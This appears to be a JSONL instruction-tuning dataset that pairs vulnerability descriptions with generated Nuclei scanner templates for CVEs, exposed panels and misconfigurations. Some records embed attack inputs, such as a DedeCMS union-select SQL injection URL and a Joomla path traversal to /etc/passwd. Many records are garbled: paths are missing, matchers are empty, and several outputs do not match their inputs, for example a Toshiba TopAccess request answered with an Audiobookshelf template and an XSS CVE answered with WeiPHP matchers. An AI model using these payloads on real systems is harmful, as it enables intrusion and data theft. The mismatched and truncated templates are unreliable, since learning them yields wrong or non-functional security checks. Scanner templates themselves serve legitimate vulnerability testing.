{"instruction": "Generate a Nuclei template for: Drupal Security Checks", "input": "Title: Drupal Security Checks\nSummary: Drupal Security Checks. A simple workflow that runs all drupal related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: drupal-workflow\n\ninfo:\n name: Drupal Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all drupal related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "drupal-workflow"}
{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Adobe Campaign", "input": "Title: Content-Security-Policy Bypass - Adobe Campaign\nSummary: Content-Security-Policy Bypass - Adobe Campaign. Tags: xss, csp-bypass, adobe-campaign\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: adobe-campaign-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Adobe Campaign\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Adobe Campaign\n tags: xss,csp-bypass,adobe-campaign,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"adobe.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "adobe-campaign-csp-bypass"}
{"instruction": "Generate a Nuclei template for: User Feedback \u2013 Create Interactive Feedback Form, User Surveys, and Polls in Seconds Detection", "input": "Title: User Feedback \u2013 Create Interactive Feedback Form, User Surveys, and Polls in Seconds Detection\nSummary: User Feedback \u2013 Create Interactive Feedback Form, User Surveys, and Polls in Seconds Detection\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-userfeedback-lite\n\ninfo:\n name: User Feedback \u2013 Create Interactive Feedback Form, User Surveys, and Polls in Seconds Detection\n author: ricardomaia\n severity: info\n description: User Feedback \u2013 Create Interactive Feedback Form, User Surveys, and Polls in Seconds Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/userfeedback-lite/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-userfeedback-lite"}
{"instruction": "Generate a Nuclei template for: Toshiba TopAccess - Default-Login", "input": "Title: Toshiba TopAccess - Default-Login\nSummary: Toshiba TopAccess - Default-Login. Tags: topaccess, default-login, misconfig\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: topaccess-default-login\n\ninfo:\n name: Toshiba TopAccess - Default-Login\n author: ritikchaddha\n severity: high\n description: Toshiba TopAccess - Default-Login\n tags: topaccess,default-login,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Administrator\" \n - \"STATUS_OKAudiobookshelf\" \n - \"content=\"Audiobookshelf\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "audiobookshelf-panel"}
{"instruction": "Generate a Nuclei template for CVE-2022-0540", "input": "Title: Authentication Bypass in atlassian jira_data_center and others\nSummary: A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.\nVulnerability Type: Authentication Bypass\nSeverity: critical\nAffected Products: atlassian jira_data_center, atlassian jira_server, atlassian jira_service_management\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-0540\n\ninfo:\n name: Atlassian Jira Seraph - Authentication Bypass\n author: DhiyaneshDK\n severity: critical\n description: Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.\n tags: cve,cve2022,atlassian,jira,exposure,auth-bypass,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;\" \n - \"{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;\" \n matchers:\n - type: word\n words:\n - \"General Insight Configuration\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2022-0540"}
{"instruction": "Generate a Nuclei template for: Codoso APT Gh0st Malware Hash - Detect", "input": "Title: Codoso APT Gh0st Malware Hash - Detect\nSummary: Codoso APT Gh0st Malware Hash - Detect. Tags: malware, apt, codoso\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: codoso-gh0st-malware\n\ninfo:\n name: Codoso APT Gh0st Malware Hash - Detect\n author: pussycat0x\n severity: info\n description: Codoso APT Gh0st Malware Hash - Detect\n tags: malware,apt,codoso\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "codoso-gh0st-malware"}
{"instruction": "Generate a Nuclei template to detect Unrestricted Upload of File with Dangerous Type", "input": "Title: Unrestricted Upload of File with Dangerous Type (CWE-434)\nSummary: The product allows the upload or transfer of dangerous file types that are automatically processed within its environment.\nVulnerability Type: Unrestricted Upload of File with Dangerous Type\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: ueditor-arbitrary-file-upload\n\ninfo:\n name: UEditor - PHP Arbitrary File Upload\n author: ChiragArtani\n severity: medium\n description: Detects arbitrary file upload vulnerability in UEditor PHP by attempting to upload and execute a PHP file. This vulnerability allows remote attackers to upload arbitrary files including PHP files, potentially leading to remote code execution.\n tags: ueditor,file-upload,rce,intrusive,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"PHP Extension\" \n - \"PHP Version\" \n part: body_2\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-434"}
{"instruction": "Generate a Nuclei template for: Google Places Photo API Test", "input": "Title: Google Places Photo API Test\nSummary: Google Places Photo API Test. Tags: token-spray, google, places\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-googleplacesphoto\n\ninfo:\n name: Google Places Photo API Test\n author: zzeitlin\n severity: info\n description: Google Places Photo API Test\n tags: token-spray,google,places,photo\n\nhttp:\n - method: GET\n path:\n - \"https://maps.googleapis.com/maps/api/place/photo?maxwidth=400&photoreference=CnRtAAAATLZNl354RwP_9UKbQ_5Psy40texXePv4oAlgP4qNEkdIrkyse7rPXYGd9D_Uj1rVsQdWT4oRz4QrYAJNpFX7rzqqMlZw2h2E2y5IKMUZ7ouD_SlcHxYq1yL4KbKUv3qtWgTK0A6QbGh87GB3sscrHRIQiG2RrmU_jF4tENr9wGS_YxoUSSDrYjWmrNfeEHSGSc3FyhNLlBU&key={{token}}\" \n matchers:\n - type: status\n status:\n - 302", "category": "generic", "severity": "info", "id": "api-googleplacesphoto"}
{"instruction": "Generate a Nuclei template for: Google Firebase DB URL Finder", "input": "Title: Google Firebase DB URL Finder\nSummary: Google Firebase DB URL Finder. Find firebaseio urls to check for security permissions\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: firebase-urls\n\ninfo:\n name: Google Firebase DB URL Finder\n author: panch0r3d\n severity: info\n description: Find firebaseio urls to check for security permissions\n tags: tech,firebase,google,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "firebase-urls"}
{"instruction": "Generate a Nuclei template for: Zzzcms 1.75 - Information Disclosure", "input": "Title: Zzzcms 1.75 - Information Disclosure\nSummary: Zzzcms 1.75 - Information Disclosure. There is a rather strange file that directly echoes some content belonging to the inaccessible zzz_config.php. The information leakage file is located in plugins\\webuploader\\js\\webconfig.php, and the management path name of the management background can be obtained directly. No need to blast admin and add 3 digits anymore\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: zzzcms-info-disclosure\n\ninfo:\n name: Zzzcms 1.75 - Information Disclosure\n author: ritikchaddha\n severity: low\n description: There is a rather strange file that directly echoes some content belonging to the inaccessible zzz_config.php. The information leakage file is located in plugins\\webuploader\\js\\webconfig.php, and the management path name of the management background can be obtained directly. No need to blast admin and add 3 digits anymore\n tags: zzzcms,info,disclosure,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"var adminpath\" \n - \"var imageMaxSize=\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "zzzcms-info-disclosure"}
{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: project-insight-login\n\ninfo:\n name: Project Insight Login Panel - Detect\n author: dhiyaneshDk\n severity: info\n description: Project Insight login panel was detected.\n tags: panel,edb,helpproject,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/auth/login\" \n matchers:\n - type: word\n words:\n - \"Project Insight - Login\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
{"instruction": "Generate a Nuclei template for: Mautic Installer Exposure", "input": "Title: Mautic Installer Exposure\nSummary: Mautic Installer Exposure. Mautic is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: mautic-installer\n\ninfo:\n name: Mautic Installer Exposure\n author: DhiyaneshDk\n severity: high\n description: Mautic is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,mautic,install,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/installer\" \n matchers:\n - type: word\n words:\n - \"Mautic Installation - Environment Check\" \n - \"Ready to Install!\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "mautic-installer"}
{"instruction": "Generate a Nuclei template for CVE-2018-20009", "input": "Title: Cross-Site Scripting (XSS) in domainmod domainmod\nSummary: DomainMOD 4.11.01 has XSS via the assets/add/ssl-provider.php SSL Provider Name or SSL Provider URL field.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: domainmod domainmod\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-20009\n\ninfo:\n name: DomainMOD 4.11.01 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider.php ssl-provider-name and ssl-provider's-url parameters.\n tags: cve,cve2018,domainmod,xss,authenticated,edb,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2018-20009"}
{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: minds\n\ninfo:\n name: Minds User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Minds user name information check was conducted.\n tags: osint,osint-political,minds,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.minds.com/{{user}}/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \") | Minds\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
{"instruction": "Generate a Nuclei template for CVE-2017-17731", "input": "Title: SQL Injection in dedecms dedecms\nSummary: DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: dedecms dedecms\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-17731\n\ninfo:\n name: DedeCMS 5.7 - SQL Injection\n author: j4vaovo\n severity: critical\n description: DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.\n tags: cve,cve2017,sqli,dedecms,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294\" \n matchers:\n - type: word\n words:\n - \"{{md5({{num}})}}\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2017-17731"}
{"instruction": "Generate a Nuclei template for: Odoo - Database Manager Discovery", "input": "Title: Odoo - Database Manager Discovery\nSummary: Odoo - Database Manager Discovery. Odoo database manager was discovered.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: odoo-database-manager\n\ninfo:\n name: Odoo - Database Manager Discovery\n author: __Fazal,R3dg33k\n severity: low\n description: Odoo database manager was discovered.\n tags: panel,odoo,backup,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/web/database/manager\" \n matchers:\n - type: word\n words:\n - \"Odoo\" \n - \".o_database_delete\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "odoo-database-manager"}
{"instruction": "Generate a Nuclei template for: Clearbit API Test", "input": "Title: Clearbit API Test\nSummary: Clearbit API Test. Search for company logos and embed them in your projects\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-clearbit\n\ninfo:\n name: Clearbit API Test\n author: daffainfo\n severity: info\n description: Search for company logos and embed them in your projects\n tags: token-spray,clearbit\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"person\":\" \n - \"\"id\":\" \n - \"\"name\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-clearbit"}
{"instruction": "Generate a Nuclei template for CVE-2025-1562", "input": "Title: Missing Authorization in funnelkit funnelkit_automations\nSummary: The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation due to a missing capability check on the install_or_activate_addon_plugins() function and a weak nonce hash in all versions up to, and including, 3.5.3. This makes it possible for unauthenticated attackers to install arbitrary plugins on the site that can be leveraged to further infect a vulnerable site.\nVulnerability Type: Missing Authorization\nSeverity: critical\nAffected Products: funnelkit funnelkit_automations\nIndicators: unauthorized", "output": "id: CVE-2025-1562\n\ninfo:\n name: Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit - Broken Access Control\n author: s4e-io\n severity: critical\n description: The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation due to a missing capability check on the install_or_activate_addon_plugins() function and a weak nonce hash in all versions up to, and including, 3.5.3. This makes it possible for unauthenticated attackers to install arbitrary plugins on the site that can be leveraged to further infect a vulnerable site.\n tags: cve,cve2025,wordpress,wp-plugin,wp,wp-marketing-automations,wordpress,authenticated,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2025-1562"}
{"instruction": "Generate a Nuclei template for: Azure OpenAI Encryption using Customer-Managed Keys Not Enabled", "input": "Title: Azure OpenAI Encryption using Customer-Managed Keys Not Enabled\nSummary: Azure OpenAI Encryption using Customer-Managed Keys Not Enabled. Ensure that your Microsoft Azure OpenAI service instances are using Customer-Managed Keys (CMKs) instead of Microsoft-managed encryption keys (i.e., default keys used by Microsoft Azure for encryption at rest) in order to have a more granular control over your Azure OpenAI data encryption and decryption process.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: azure-openai-cmk-not-enabled\n\ninfo:\n name: Azure OpenAI Encryption using Customer-Managed Keys Not Enabled\n author: princechaddha\n severity: high\n description: Ensure that your Microsoft Azure OpenAI service instances are using Customer-Managed Keys (CMKs) instead of Microsoft-managed encryption keys (i.e., default keys used by Microsoft Azure for encryption at rest) in order to have a more granular control over your Azure OpenAI data encryption and decryption process.\n tags: cloud,devops,azure,microsoft,openai,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "azure-openai-cmk-not-enabled"}
{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - HERE API", "input": "Title: Content-Security-Policy Bypass - HERE API\nSummary: Content-Security-Policy Bypass - HERE API. Tags: xss, csp-bypass, here-api\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: here-api-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - HERE API\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - HERE API\n tags: xss,csp-bypass,here-api,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"here.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "here-api-csp-bypass"}
{"instruction": "Generate a Nuclei template for CVE-2022-24181", "input": "Title: Cross-Site Scripting (XSS) in public_knowledge_project open_journal_systems\nSummary: Cross-site scripting (XSS) via Host Header injection in PKP Open Journals System 2.4.8 >= 3.3 allows remote attackers to inject arbitary code via the X-Forwarded-Host Header.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: public_knowledge_project open_journal_systems\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-24181\n\ninfo:\n name: PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting\n author: lucasljm2001,ekrause\n severity: medium\n description: PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header.\n tags: cve,cve2022,xss,oss,pkp-lib,edb,public_knowledge_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"WeiPHP\" \n - \"/weiphp.css?\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
{"instruction": "Generate a Nuclei template for: Checkpoint Security Checks", "input": "Title: Checkpoint Security Checks\nSummary: Checkpoint Security Checks. A simple workflow that runs all Checkpoint related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: checkpoint-workflow\n\ninfo:\n name: Checkpoint Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all Checkpoint related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "checkpoint-workflow"}
{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: ws_ftp-server-web-transfer\n\ninfo:\n name: WS_FTP Server Web Transfer - Panel Detect\n author: johnk3r\n severity: info\n description: WS_FTP Server Web Transfer panel was detected.\n tags: panel,ws_ftp,progress,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"}
{"instruction": "Generate a Nuclei template for CVE-2018-6530", "input": "Title: OS Command Injection in dlink dir-860l_firmware and others\nSummary: OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: dlink dir-860l_firmware, dlink dir-865l_firmware, dlink dir-868l_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-6530\n\ninfo:\n name: D-Link - Unauthenticated Remote Code Execution\n author: gy741\n severity: critical\n description: OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.\n tags: cve,cve2018,d-link,rce,oast,unauth,kev,dlink,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol\n - type: word\n words:\n - \"User-Agent: curl\" \n part: interactsh_request", "category": "cve", "severity": "critical", "id": "CVE-2018-6530"}
{"instruction": "Generate a Nuclei template for: Mysql History - File Disclosure", "input": "Title: Mysql History - File Disclosure\nSummary: Mysql History - File Disclosure. The mysql_history file is a history file used by the MySQL command-line client (mysql) to store a record of the SQL commands and statements entered by a user during their interactive MySQL sessions. It serves as a command history for the MySQL client, allowing users to recall and reuse previously executed SQL commands.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: mysql-history\n\ninfo:\n name: Mysql History - File Disclosure\n author: kazet\n severity: low\n description: The mysql_history file is a history file used by the MySQL command-line client (mysql) to store a record of the SQL commands and statements entered by a user during their interactive MySQL sessions. It serves as a command history for the MySQL client, allowing users to recall and reuse previously executed SQL commands.\n tags: misconfig,disclosure,config,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/.mysql_history\" \n matchers:\n - type: word\n words:\n - \"_HiStOrY_V2_\" \n - \"show databases;\" \n condition: or\n - type: word\n words:\n - \"application/octet-stream\" \n - \"text/plain\" \n - \"filename=\".mysql_\" \n part: header\n - type: word\n words:\n - \"\" \n - \"text/html\" \n - \"image/\" \n part: response\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "mysql-history"}
{"instruction": "Generate a Nuclei template for: Doppler Audit Token", "input": "Title: Doppler Audit Token\nSummary: Doppler Audit Token. Tags: doppler, exposure, tokens\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: doppler-audit-token\n\ninfo:\n name: Doppler Audit Token\n author: DhiyaneshDK\n severity: info\n description: Doppler Audit Token\n tags: doppler,exposure,tokens,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "doppler-audit-token"}
{"instruction": "Generate a Nuclei template for: Hongjing Human Resource Management System - SQL Injection", "input": "Title: Hongjing Human Resource Management System - SQL Injection\nSummary: Hongjing Human Resource Management System - SQL Injection. There is a SQL injection vulnerability in the categories of Hongjing Human Resource Management System, from which attackers can obtain sensitive database information.\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: CNVD-2023-08743\n\ninfo:\n name: Hongjing Human Resource Management System - SQL Injection\n author: SleepingBag945\n severity: critical\n description: There is a SQL injection vulnerability in the categories of Hongjing Human Resource Management System, from which attackers can obtain sensitive database information.\n tags: cnvd2023,cnvd,hongjing,hcm,sqli,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "critical", "id": "CNVD-2023-08743"}
{"instruction": "Generate a Nuclei template for CVE-2010-1353", "input": "Title: Path Traversal in wowjoomla com_loginbox\nSummary: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: wowjoomla com_loginbox\nIndicators: error, vulnerability detected", "output": "id: CVE-2010-1353\n\ninfo:\n name: Joomla! Component LoginBox - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.\n tags: cve,cve2010,joomla,lfi,edb,wowjoomla,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2010-1353"}
{"instruction": "Generate a Nuclei template for: Landray-OA - Remote Code Execution", "input": "Title: Landray-OA - Remote Code Execution\nSummary: Landray-OA - Remote Code Execution. Landray-OA `erp_data.jsp` is vulnerable to remote code execution vulnerability.\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: landray-oa-erp-data-rce\n\ninfo:\n name: Landray-OA - Remote Code Execution\n author: SleepingBag945\n severity: critical\n description: Landray-OA `erp_data.jsp` is vulnerable to remote code execution vulnerability.\n tags: landray,rce,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: word\n words:\n - \"{\"message\":\"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "critical", "id": "landray-oa-erp-data-rce"}
{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: ftm-manager-panel\n\ninfo:\n name: Financial Transaction Manager Login Panel - Detect\n author: idealphase\n severity: info\n description: Financial Transaction Manager login panel was detected.\n tags: panel,ftm,ibm,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"FTM Manager\" \n - \"login-panel\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
{"instruction": "Generate a Nuclei template for: Azure Databases - Cloud Enumeration", "input": "Title: Azure Databases - Cloud Enumeration\nSummary: Azure Databases - Cloud Enumeration. Searches for Azure databases via their registered DNS names\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: azure-db-enum\n\ninfo:\n name: Azure Databases - Cloud Enumeration\n author: initstring\n severity: info\n description: Searches for Azure databases via their registered DNS names\n tags: cloud,enum,cloud-enum,azure,dns,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "azure-db-enum"}
{"instruction": "Generate a Nuclei template for CVE-2019-9762", "input": "Title: SQL Injection in phpshe phpshe\nSummary: A SQL Injection was discovered in PHPSHE 1.7 in include/plugin/payment/alipay/pay.php with the parameter id. The vulnerability does not need any authentication.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: phpshe phpshe\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-9762\n\ninfo:\n name: PHPSHE 1.7 - SQL Injection\n author: DhiyaneshDK\n severity: critical\n description: A SQL Injection was discovered in PHPSHE 1.7 in include/plugin/payment/alipay/pay.php with the parameter id. The vulnerability does not need any authentication.\n tags: cve,cve2019,phpshe,sqli,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"{{md5({{num}})}}\" \n part: body", "category": "cve", "severity": "critical", "id": "CVE-2019-9762"}
